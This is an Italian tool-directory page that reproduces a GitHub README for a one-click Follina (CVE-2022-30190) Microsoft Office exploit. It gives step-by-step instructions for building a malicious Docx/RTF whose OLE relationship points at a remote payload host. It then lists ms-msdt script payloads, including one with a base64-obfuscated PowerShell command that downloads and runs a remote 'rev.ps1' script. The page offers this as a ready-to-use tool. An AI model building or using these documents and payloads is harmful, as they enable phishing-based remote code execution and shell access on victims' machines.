Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
MS-MSDT-Office-RCE-Follina — CVE-2022-30190 | MS-MSDT Follina Un Click | Kitploit
Strumenti/GitHubGitHub/0xflagplz/ms-msdt-office-rce-follina
Strumenti di PhishingGenerazione di PayloadExploitMovimento LateraleSfruttamento di Applicazioni WebCommand and Control
GitHub0xflagplz/ms-msdt-office-rce-follina

MS-MSDT-Office-RCE-Follina

CVE-2022-30190 | MS-MSDT Follina Un Click

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
201244 anni faRevisionato da Kitploit

MS-MSDT-Office-RCE-Follina

CVE-2022-30190 | MS-MSDT Follina One Click

  1. Crea un file Docx.
  2. Nel file Docx, Inserisci > Oggetto > Immagine Bitmap > Ok
  3. Nell'applicazione Paint che si è avviata, salva il file Paint.
  4. Salva il tuo file Docx.
  5. Apri il file come archivio (Con 7Zip; Click Destro > 7Zip > Apri Archivio.)
  6. Copia il file Document.xml da \Word\ e il file document.xml.rels da \word_rels\
  7. Apri/Modifica \word_rels\Document.xml.rels e individua il tag XML della relazione con "/relationships/oleObject". Dopodiché sostituisci la destinazione in "Target=" con la tua destinazione remota da cui verrà prelevato il payload. Aggiungi anche "TargetMode="External"" al tag XML.
  8. Ricomprimi in un file Docx (Invia a > Cartella compressa (zippata) | Rinomina l'estensione da zip a docx/doc)

Formato File RTF

Una volta che un docx è stato salvato utilizzando i parametri step / parametri seguenti. Salva il Docx come RTF.

Se aggiungi anche questi elementi sotto l'elemento <o:OLEObject> in word/document.xml:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

L'operazione di ricompressione può essere osservata anche dallo script Python di JohnHammond:
~ Ricostruisce il file office originale ~

root@kitploit:~
shutil.make_archive(args.output, "zip", doc_path)  
os.rename(args.output + ".zip", args.output)  

Riferimento: https://github.com/JohnHammond/msdt-follina/blob/main/follina.py


Payloads

Esecuzione Calcolatrice Base:

root@kitploit:~
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

Puoi sostituire Start-Process('calc') con:

IEX('calc.exe')


Esecuzione Condivisione SMB:

root@kitploit:~
<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=/../../$(\\\\taretip\\share\\poc)/.exe)"";
</script>

Caricamento File PS1:

root@kitploit:~
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cG93ZXJzaGVsbC5leGUgLWMgImlleCAoaXdyIGh0dHA6Ly8xOTIuMTY4LjE5OC4xMjgvcmV2LnBzMSAtVXNlQmFzaWNQYXJzaW5nKSIK'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>  

Decodificato: Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("powershell.exe -c "iex (iwr http://192.168.198.128/rev.ps1 -UseBasicParsing)""))


Apache2 access.log dovrebbe mostrare la connessione all'apertura del file

Esempio di Log

Scarica lo strumento